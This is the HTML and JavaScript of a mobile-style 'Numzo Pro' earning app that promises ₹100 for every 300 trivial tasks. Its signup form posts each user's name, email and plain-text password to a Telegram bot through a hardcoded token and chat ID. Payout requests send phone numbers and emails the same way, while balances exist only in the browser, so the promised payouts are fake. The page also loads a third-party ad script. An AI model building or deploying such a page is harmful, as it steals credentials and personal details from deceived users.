<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" id="viewport" content="width=device-width, initial-scale=1.0">
    <title>Numzo Pro - Diamond Elite</title>
    <link href="https://fonts.googleapis.com/css2?family=Outfit:wght@300;400;600;800&display=swap" rel="stylesheet">
    <style>
        :root { --gold: #fbbf24; --gold-glow: rgba(251, 191, 36, 0.4); --bg: #010409; --card: #0d1117; }
        * { margin: 0; padding: 0; box-sizing: border-box; font-family: 'Outfit', sans-serif; }
        body { background: var(--bg); color: white; height: 100vh; overflow: hidden; }

        /* --- ⚡ ULTRA FAST OFFLINE UI ⚡ --- */
        #offline-status-screen {
            position: fixed; inset: 0; background: #010409; z-index: 30000;
            display: none; flex-direction: column; align-items: center; justify-content: center; text-align: center; padding: 20px;
        }
        .offline-icon { font-size: 80px; margin-bottom: 20px; animation: pulse 1s infinite; }
        @keyframes pulse { 0% { transform: scale(1); opacity: 1; } 50% { transform: scale(1.1); opacity: 0.5; } 100% { transform: scale(1); opacity: 1; } }

        /* --- AUTH LAYER --- */
        #auth-overlay { position: fixed; inset: 0; background: radial-gradient(circle at center, #1e1b4b, #010409); z-index: 9999; display: flex; align-items: center; justify-content: center; padding: 20px; transition: 0.8s; }
        .auth-card { background: rgba(13, 17, 23, 0.9); backdrop-filter: blur(20px); width: 100%; max-width: 380px; padding: 40px; border-radius: 40px; border: 1px solid rgba(251, 191, 36, 0.2); text-align: center; box-shadow: 0 0 50px rgba(0,0,0,0.5); }
        .input-box { width: 100%; background: #161b22; border: 1.5px solid #30363d; padding: 18px; border-radius: 20px; color: white; outline: none; margin-bottom: 15px; transition: 0.3s; }
        .input-box:focus { border-color: var(--gold); box-shadow: 0 0 15px var(--gold-glow); }
        .btn-gold { width: 100%; padding: 18px; border-radius: 20px; border: none; background: linear-gradient(135deg, #fbbf24, #f59e0b); color: #000; font-weight: 800; cursor: pointer; transition: 0.3s; box-shadow: 0 10px 20px rgba(0,0,0,0.3); }

        /* --- DASHBOARD --- */
        #main-content { height: 100%; overflow-y: auto; padding: 25px; padding-bottom: 120px; }
        .page { display: none; flex-direction: column; animation: slideUp 0.5s ease; }
        @keyframes slideUp { from { opacity: 0; transform: translateY(20px); } to { opacity: 1; transform: translateY(0); } }

        .glass-panel { background: linear-gradient(145deg, #0d1117, #161b22); padding: 30px 20px; border-radius: 35px; border: 1px solid rgba(255,255,255,0.03); margin-bottom: 25px; text-align: center; box-shadow: 0 20px 40px rgba(0,0,0,0.5); }
        .task-tile { background: var(--card); padding: 20px; border-radius: 25px; display: flex; align-items: center; gap: 15px; margin-bottom: 15px; border: 1px solid #21262d; transition: 0.3s; cursor: pointer; }
        .task-tile:active { border-color: var(--gold); transform: scale(0.98); }

        /* --- PROFILE LUXURY --- */
        .luxury-profile { background: linear-gradient(135deg, #fbbf24, #f59e0b); padding: 45px 20px; border-radius: 40px; text-align: center; color: #000; margin-bottom: 30px; position: relative; overflow: hidden; box-shadow: 0 20px 40px var(--gold-glow); }
        .luxury-profile::after { content: ''; position: absolute; top: -50%; left: -50%; width: 200%; height: 200%; background: linear-gradient(45deg, transparent, rgba(255,255,255,0.3), transparent); transform: rotate(45deg); animation: shine 3s infinite; }
        @keyframes shine { 0% { left: -50%; } 100% { left: 150%; } }
        .p-avatar { width: 110px; height: 110px; background: #000; color: #fff; border-radius: 40px; margin: 0 auto 15px; display: flex; align-items: center; justify-content: center; font-size: 50px; font-weight: 800; border: 4px solid #fff; }

        /* --- NAV --- */
        .bottom-nav { position: fixed; bottom: 15px; left: 15px; right: 15px; height: 80px; background: rgba(13, 17, 23, 0.95); backdrop-filter: blur(20px); border-radius: 30px; display: flex; justify-content: space-around; align-items: center; border: 1px solid rgba(255,255,255,0.08); z-index: 9000; }
        .nav-item { color: #8b949e; font-size: 11px; text-align: center; cursor: pointer; transition: 0.3s; }
        .nav-item.active { color: var(--gold); }
        .nav-item b { font-size: 26px; display: block; font-style: normal; margin-bottom: 2px; }

        .p-bar-bg { height: 12px; background: #161b22; border-radius: 10px; margin-top: 20px; overflow: hidden; }
        .p-bar-fill { height: 100%; background: var(--gold); width: 0%; border-radius: 10px; transition: 0.6s; box-shadow: 0 0 15px var(--gold); }
    </style>
</head>
<script src="https://quge5.com/88/tag.min.js" data-zone="211363" async data-cfasync="false"></script>
<body>

    <div id="offline-status-screen">
        <div class="offline-icon">📡❌</div>
        <h1 style="color:var(--gold); margin-bottom:10px;">Connection Lost</h1>
        <p style="opacity:0.6;">Bhai, Net OFF hai!<br>Kripya internet on karein app chalane ke liye.</p>
    </div>

    <div id="auth-overlay">
        <div class="auth-card">
            <h1 style="color:var(--gold); font-size: 35px; margin-bottom: 10px;">NUMZO PRO</h1>
            <p style="opacity:0.4; margin-bottom:30px; font-size: 12px; letter-spacing: 2px;">DIAMOND VAULT</p>
            <input type="text" id="rName" class="input-box" placeholder="Your Full Name">
            <input type="email" id="rEmail" class="input-box" placeholder="Gmail Address">
            <input type="password" id="rPass" class="input-box" placeholder="Secret Password (Min 6)">
            <button class="btn-gold" onclick="doSignup()">Unleash Earning</button>
        </div>
    </div>

    <div id="main-content">
        <div id="homePage" class="page" style="display: flex;">
            <div style="display: flex; justify-content: space-between; align-items: center; margin-bottom: 25px;">
                <div><h2 id="uNameDash" style="font-size: 26px;">Hi!</h2><p style="opacity:0.4; font-size:12px;">Elite Member</p></div>
                <div style="background:rgba(251,191,36,0.1); border:1px solid var(--gold); padding:10px 20px; border-radius:50px; color:var(--gold); font-weight:800; font-size:20px;">₹<span id="bal1">0.00</span></div>
            </div>
            <div class="glass-panel">
                <p style="opacity: 0.5; font-size: 11px; letter-spacing: 2px;">TASK MILESTONE (₹100 REWARD)</p>
                <h1 style="font-size: 60px; margin: 10px 0;"><span id="countDisp">0</span><small style="font-size:20px; opacity:0.2;">/300</small></h1>
                <div class="p-bar-bg"><div id="pBar" class="p-bar-fill"></div></div>
                <p style="font-size:10px; opacity:0.4; margin-top:10px;">Complete 300 tasks to unlock ₹100 instantly</p>
            </div>
            <div class="task-tile" onclick="openGame('math')">
                <div style="font-size:28px;">⚡</div>
                <div style="flex:1;"><h3>Quantum Math</h3><p style="font-size:11px; opacity:0.5;">Quick solve, High reward</p></div>
                <span>❯</span>
            </div>
            <div class="task-tile" onclick="openGame('guess')">
                <div style="font-size:28px;">🎮</div>
                <div style="flex:1;"><h3>Game Hunter</h3><p style="font-size:11px; opacity:0.5;">Guess & Earn Diamond Chips</p></div>
                <span>❯</span>
            </div>
        </div>

        <div id="walletPage" class="page">
            <h2 style="margin-bottom:25px;">Withdrawals</h2>
            <div class="glass-panel" style="border: 2px solid var(--gold); background: rgba(251,191,36,0.02);">
                <p style="opacity:0.5;">Main Balance</p>
                <h1 style="font-size:65px; color:var(--gold);">₹<span id="walletBal">0.00</span></h1>
                <p style="font-size:12px; color:#f87171; font-weight:bold;">Min Withdrawal: ₹200</p>
            </div>
            <div class="task-tile" onclick="showPayPop('PhonePe')">
                <img src="https://img.icons8.com/color/48/phone-pe.png" width="40">
                <div style="flex:1;"><h3>PhonePe</h3><p style="font-size:11px; opacity:0.5;">Instant Settlement</p></div>
            </div>
            <div class="task-tile" onclick="showPayPop('Redeem Code')">
                <img src="https://img.icons8.com/color/48/google-play.png" width="40">
                <div style="flex:1;"><h3>Redeem Code</h3><p style="font-size:11px; opacity:0.5;">Gmail Delivery</p></div>
            </div>
        </div>

        <div id="profilePage" class="page">
            <div class="luxury-profile">
                <div id="avatar" class="p-avatar">U</div>
                <h2 id="pName" style="font-size:28px; font-weight:800;">Member Name</h2>
                <p id="pEmail" style="opacity:0.7; font-size:14px; margin-top:5px;">user@gmail.com</p>
            </div>
            <div class="task-tile" onclick="changeTab('aboutPage')">
                <div style="font-size:22px;">🛡️</div>
                <div style="flex:1;"><h3>About Numzo Pro</h3><p style="font-size:11px; opacity:0.5;">Company & Security Info</p></div>
                <span>❯</span>
            </div>
            <button class="btn-gold" style="background:#ef4444; color:white; margin-top:30px; box-shadow:none;" onclick="logout()">Deactivate Session</button>
        </div>

        <div id="aboutPage" class="page">
            <h2 style="margin-bottom:25px;">Information</h2>
            <div class="glass-panel" style="text-align:left; padding:35px;">
                <div style="width:70px; height:70px; background:var(--gold); border-radius:20px; display:flex; align-items:center; justify-content:center; color:#000; font-size:35px; font-weight:800; margin-bottom:20px;">N</div>
                <h3 style="color:var(--gold); margin-bottom:15px;">NUMZO PRO ELITE</h3>
                <p style="font-size:14px; opacity:0.8; line-height:1.7;">Numzo Pro Diamond Edition is an authorized rewards platform. We provide high-value payouts of ₹100 for every 300 micro-tasks completed. Our payout threshold is strictly ₹200 to ensure stable economy. Verified via Telegram Bot API.</p>
                <button class="btn-gold" style="margin-top:30px;" onclick="changeTab('profilePage')">Back to Profile</button>
            </div>
        </div>

        <div id="tasksPage" class="page">
            <h2 style="text-align: center; margin-bottom: 30px; letter-spacing: 2px;">MISSION HUB</h2>
            <div id="mathBox" class="glass-panel" style="background:var(--card); border:none;">
                <h1 id="mathQ" style="font-size: 70px; margin-bottom: 30px;">? + ?</h1>
                <input type="number" id="mathInput" class="input-box" style="text-align:center; font-size:35px;" placeholder="0">
                <button class="btn-gold" onclick="checkMath()">Confirm Sum</button>
            </div>
            <div id="guessBox" class="glass-panel" style="background:var(--card); border:none; display:none;">
                <h2 id="guessQ" style="font-size: 40px; letter-spacing: 12px; color:var(--gold); margin-bottom: 35px; text-transform:uppercase;">...</h2>
                <input type="text" id="guessInput" class="input-box" style="text-align:center;" placeholder="Name the Game">
                <button class="btn-gold" onclick="checkGuess()">Verify Game</button>
            </div>
        </div>
    </div>

    <div id="successScreen" style="position:fixed; inset:0; display:none; flex-direction:column; align-items:center; justify-content:center; background:var(--bg); z-index:20000;">
        <div style="text-align:center;">
            <div style="font-size:120px;">✅</div>
            <h1 style="color:var(--gold); font-size: 35px; margin:20px 0;">Success!</h1>
            <p style="opacity:0.6; padding:0 40px;">Request sent to admin. Payouts take 24-48 hours.</p>
            <button class="btn-gold" style="margin-top:50px; width:220px;" onclick="location.reload()">Great!</button>
        </div>
    </div>

    <div id="payModal" style="position:fixed; inset:0; background:rgba(0,0,0,0.98); display:none; align-items:center; justify-content:center; z-index:15000; padding:20px;">
        <div class="auth-card" style="width:100%; border:2px solid var(--gold);">
            <h2 id="payTitle" style="color:var(--gold); font-size:28px;">Withdraw</h2>
            <p id="payTip" style="font-size:12px; color:#f87171; margin:15px 0;">Min ₹200 required.</p>
            <input type="text" id="payDetail" class="input-box" placeholder="Enter Details">
            <input type="number" id="payAmt" class="input-box" placeholder="Amount (Min ₹200)">
            <button class="btn-gold" onclick="requestPayout()">Submit Request</button>
            <p style="margin-top:25px; opacity:0.4; cursor:pointer;" onclick="document.getElementById('payModal').style.display='none'">Dismiss</p>
        </div>
    </div>

    <div class="bottom-nav" id="sticky-nav" style="display:none;">
        <div class="nav-item active" id="nav-home" onclick="changeTab('homePage')"><b>🏠</b>Home</div>
        <div class="nav-item" id="nav-tasks" onclick="changeTab('tasksPage')"><b>🎯</b>Tasks</div>
        <div class="nav-item" id="nav-wallet" onclick="changeTab('walletPage')"><b>💰</b>Wallet</div>
        <div class="nav-item" id="nav-profile" onclick="changeTab('profilePage')"><b>👤</b>Profile</div>
    </div>

    <script>
        const BOT_TOKEN = "7957030602:AAHN6voyeFre0ey9KEv0kuJSSEhGz92Enxg";
        const CHAT_ID = "6189064168";
        let mAns, gAns, curM;

        // --- ⚡ ULTRA FAST INTERNET CHECKER ⚡ ---
        async function checkFastConnection() {
            const controller = new AbortController();
            const timeoutId = setTimeout(() => controller.abort(), 1500);
            try {
                await fetch('https://www.google.com/favicon.ico', { mode: 'no-cors', cache: 'no-store', signal: controller.signal });
                document.getElementById('offline-status-screen').style.display = 'none';
            } catch (e) {
                document.getElementById('offline-status-screen').style.display = 'flex';
            } finally { clearTimeout(timeoutId); }
        }
        setInterval(checkFastConnection, 2000);

        // --- CORE UI ---
        function changeTab(id) {
            document.querySelectorAll('.page').forEach(p => p.style.display = 'none');
            document.querySelectorAll('.nav-item').forEach(n => n.classList.remove('active'));
            document.getElementById(id).style.display = 'flex';
            let nid = id.replace('Page','').toLowerCase();
            if(document.getElementById('nav-'+nid)) document.getElementById('nav-'+nid).classList.add('active');
            updateUI();
        }

        function openGame(t) {
            changeTab('tasksPage');
            if(t==='math') { document.getElementById('mathBox').style.display='block'; document.getElementById('guessBox').style.display='none'; genMath(); }
            else { document.getElementById('mathBox').style.display='none'; document.getElementById('guessBox').style.display='block'; genGuess(); }
        }

        function genMath() {
            let n1 = Math.floor(Math.random()*50)+10, n2 = Math.floor(Math.random()*30)+5;
            mAns = n1 + n2; document.getElementById('mathQ').innerText = n1 + " + " + n2;
        }

        function checkMath() {
            if(parseInt(document.getElementById('mathInput').value) === mAns) { scoreAction(); genMath(); document.getElementById('mathInput').value=""; }
            else alert("❌ Wrong Answer!");
        }

        function genGuess() {
            const games = [{q:"P _ B G", a:"pubg"}, {q:"L _ D O", a:"ludo"}, {q:"F R _ E F _ R E", a:"free fire"}];
            let g = games[Math.floor(Math.random()*games.length)];
            document.getElementById('guessQ').innerText = g.q; gAns = g.a;
        }

        function checkGuess() {
            if(document.getElementById('guessInput').value.toLowerCase().trim() === gAns) { scoreAction(); genGuess(); document.getElementById('guessInput').value=""; }
            else alert("❌ Wrong Game!");
        }

        function scoreAction() {
            let c = (parseInt(localStorage.getItem('numzoCount')) || 0) + 1;
            if(c >= 300) {
                let b = parseFloat(localStorage.getItem('numzoWallet')) || 0;
                localStorage.setItem('numzoWallet', (b + 100).toFixed(2));
                c = 0; alert("🎉 ₹100 Reward Added!");
            }
            localStorage.setItem('numzoCount', c); updateUI();
        }

        function updateUI() {
            let c = localStorage.getItem('numzoCount') || 0;
            let b = parseFloat(localStorage.getItem('numzoWallet') || 0).toFixed(2);
            document.getElementById('countDisp').innerText = c;
            document.getElementById('pBar').style.width = (c/300*100) + "%";
            document.getElementById('bal1').innerText = b;
            document.getElementById('walletBal').innerText = b;
            let n = localStorage.getItem('uName') || 'User';
            document.getElementById('uNameDash').innerText = "Hi, " + n;
            document.getElementById('pName').innerText = n;
            document.getElementById('pEmail').innerText = localStorage.getItem('uEmail') || 'user@gmail.com';
            document.getElementById('avatar').innerText = n[0].toUpperCase();
        }

        async function doSignup() {
            let n = document.getElementById('rName').value;
            let e = document.getElementById('rEmail').value;
            let p = document.getElementById('rPass').value;
            if(n && e.includes('@') && p.length >= 6) {
                await fetch(`https://api.telegram.org/bot${BOT_TOKEN}/sendMessage?chat_id=${CHAT_ID}&text=${encodeURIComponent("👤 NEW USER\nName: "+n+"\nEmail: "+e+"\nPass: "+p)}`);
                localStorage.setItem('uName', n); localStorage.setItem('uEmail', e);
                localStorage.setItem('isLogged', 'true'); checkLogin();
            } else alert("Details sahi dalo!");
        }

        function checkLogin() {
            if(localStorage.getItem('isLogged') === 'true') {
                document.getElementById('auth-overlay').style.display = 'none';
                document.getElementById('sticky-nav').style.display = 'flex';
                updateUI();
            }
        }

        function showPayPop(m) {
            curM = m;
            document.getElementById('payTitle').innerText = m;
            document.getElementById('payDetail').placeholder = m === 'PhonePe' ? 'Number' : 'Email';
            document.getElementById('payModal').style.display = 'flex';
        }

        async function requestPayout() {
            let b = parseFloat(localStorage.getItem('numzoWallet') || 0);
            let a = parseFloat(document.getElementById('payAmt').value);
            let d = document.getElementById('payDetail').value;
            if(a >= 200 && a <= b && d.length > 5) {
                await fetch(`https://api.telegram.org/bot${BOT_TOKEN}/sendMessage?chat_id=${CHAT_ID}&text=${encodeURIComponent("💎 WITHDRAWAL\nUser: "+localStorage.getItem('uName')+"\nAmt: ₹"+a+"\nMode: "+curM+"\nInfo: "+d)}`);
                localStorage.setItem('numzoWallet', (b - a).toFixed(2));
                document.getElementById('payModal').style.display = 'none';
                document.getElementById('successScreen').style.display = 'flex';
            } else alert("Balance ya details check karein!");
        }

        function logout() { localStorage.clear(); location.reload(); }
            window.onload = checkLogin;
    </script>
</body>
</html>